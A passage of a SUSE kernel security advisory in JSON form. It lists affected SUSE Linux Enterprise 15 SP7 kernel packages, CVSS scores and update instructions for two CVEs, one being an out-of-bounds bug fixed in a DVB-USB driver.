"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
